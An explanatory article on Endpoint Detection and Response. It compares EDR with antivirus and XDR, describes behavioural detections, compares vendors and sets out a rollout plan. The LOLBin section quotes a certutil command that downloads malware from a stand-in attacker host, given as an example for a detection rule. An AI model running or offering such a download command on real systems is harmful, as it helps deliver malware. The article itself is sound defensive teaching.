Endpoint Detection and Response (EDR) - Verhaltensbasierter Endpunktschutz

EDR solves the core problem of traditional antivirus: signatures only detect known threats. Modern attackers easily bypass signatures—through obfuscation, polymorphism, or fileless attacks. EDR monitors WHAT a process does, not HOW it looks.

EDR vs. Antivirus vs. XDR

Generation 1: Antivirus (AV)

• Method: Signature comparison (hash/pattern)
• Detects: known malware
• Blind to: new malware, obfuscation, fileless attacks
• Response: Delete/quarantine file

Ease of bypass: A single modified byte results in a new hash with no match. Base64 encoding of a PowerShell script also produces no match. Living-off-the-land (certutil, mshta) does not trigger antivirus detection.

Generation 2: NGAV (Next-Gen AV)

• Method: ML + static analysis + signatures
• Detects: known + unknown malware families
• Blind to: behavioral anomalies, memory-only attacks

Generation 3: EDR

• Method: Behavioral monitoring of all processes
• Detects: fileless attacks, injection, LOLBins, memory manipulation
• Views: Process tree diagram (who spawned whom?)
• Response: Isolation, kill, forensic snapshot

Generation 4: XDR (Extended Detection and Response)

• Method: Correlation across endpoint + network + cloud + identity
• Detects: complex multi-stage attacks
• Example: Endpoint alert + cloud login anomaly = an incident
• Products: Microsoft Defender XDR, Palo Alto Cortex XDR

EDR Core Capabilities

Capability	Description
Telemetry	All processes, network connections, registry changes
Detection	Behavioral rules + ML + Threat Intel IOCs
Investigation	Visualize attack tree (parent→child processes)
Response	Isolation, process kill, remote forensics
Hunting	Proactive search for indicators of compromise

Core EDR Detections

Process Injection

• Injecting code into a foreign process (e.g., svchost.exe)
• Techniques: CreateRemoteThread, Process Hollowing, DLL Injection
• EDR detects anomalous memory write operations in third-party processes
• Event: suspicious memory allocation + execution in svchost.exe

LOLBin (Living-off-the-Land)

Abuse of legitimate Windows tools such as mshta.exe, regsvr32.exe, certutil.exe, rundll32.exe.

Example rule: Alert if certutil.exe is called with a URL parameter (download indicator):

certutil.exe -urlcache -split -f http://evil.com/malware.exe

Legitimate use is rare – an alert is triggered immediately.

Fileless Malware

• Only in RAM – no file on disk
• PowerShell: encoded command + AMSI bypass
• Reflective DLL Loading: Load DLL directly into memory
• EDR detects PowerShell process with Base64 content → Alert

AMSI Bypass Detection

• Attacker patches AMSI (AntiMalware Scan Interface) in RAM
• EDR detects memory write to AMSI.dll region → immediate alert

Signed Binary Abuse (DLL Hijacking)

• Signed binary with malicious side-DLL
• EDR detects DLL from unexpected location → alert

Persistence Detection

EDR detects and alerts for all common persistence techniques:

• Registry Run key (HKCU\Software\Microsoft\Windows\CurrentVersion\Run)
• Scheduled task created
• WMI event subscription
• Startup folder

EDR Products Compared

Microsoft Defender for Endpoint (MDE)

Strengths:

• Native Windows integration (deep within the OS)
• M365/Entra integration: Identity + Endpoint
• Attack Surface Reduction (ASR) Rules
• Defender Antivirus integrated
• Microsoft Sentinel: seamless SIEM integration
• Cost-effective for Microsoft shops (in the E5 bundle)

Weaknesses:

• Mac/Linux: less mature than Windows
• Lower telemetry granularity than CrowdStrike

Costs: Defender for Business approx. 3 EUR/user/month (SMB); E5 bundle approx. 52 EUR/user/month (all-inclusive)

CrowdStrike Falcon

Strengths:

• Market leader in the EDR industry (Gartner Magic Quadrant)
• OverWatch: 24/7 threat hunting by the CrowdStrike team
• Best cross-platform coverage (Windows/Mac/Linux)
• Threat Graph: global threat intelligence from millions of sensors

Weaknesses:

• Very expensive
• Noted: In July 2024, a sensor update caused a global BSOD outage

Lesson learned: Testing updates before a global rollout is mandatory.

SentinelOne Singularity

Strengths:

• Fully automated remediation (no analyst required)
• Storyline: Attack graph is automatically generated
• Autonomous Response: isolates, kills, and rolls back without human intervention
• Singularity XDR: SIEM + EDR integrated

Particularly suitable for companies that prioritize automation.

Palo Alto Cortex XDR

• Strong network integration (Prisma + XDR)
• Well-suited if NGFW is already from Palo Alto
• Very comprehensive, complex to operate

EDR Implementation: Rollout Strategy

Phase 1: Pilot Group (Weeks 1–4)

• 50–100 computers (IT department, non-critical systems)
• Monitoring mode: alerts only, no blocking
• Tuning: identify and exclude false positives
• Baseline: learn normal activity patterns

Phase 2: Expanded pilot group (Weeks 5–8)

• 500 computers (various departments)
• Activate first block rules (high-confidence detections only)
• Integrate help desk: Employees report EDR blocks
• Escalation path: SOC analyst → IT admin → Help desk

Phase 3: Full rollout (Months 3–6)

• All endpoints + servers
• Activate advanced rules (after baseline learning)
• Automated response: critical threats are immediately isolated

False Positive Management

The first 4 weeks: alert only, no block. Afterward, gradually enable blocking for high-confidence rules. IT is aware of legitimate exceptions (monitoring tools).

Common False Positives:

• Backup software: reads many files → may trigger ransomware detection
• Developer tools: code injection during debugging → EDR alert possible
• Automated tests: exploit code in test environments

EDR Telemetry for SIEM

• EDR delivers high-quality events to the SIEM (CEF/Syslog)
• Correlation: EDR alert + SIEM context = better triage
• Example: EDR alert “Kerberoasting” + AD event 4769 = joint incident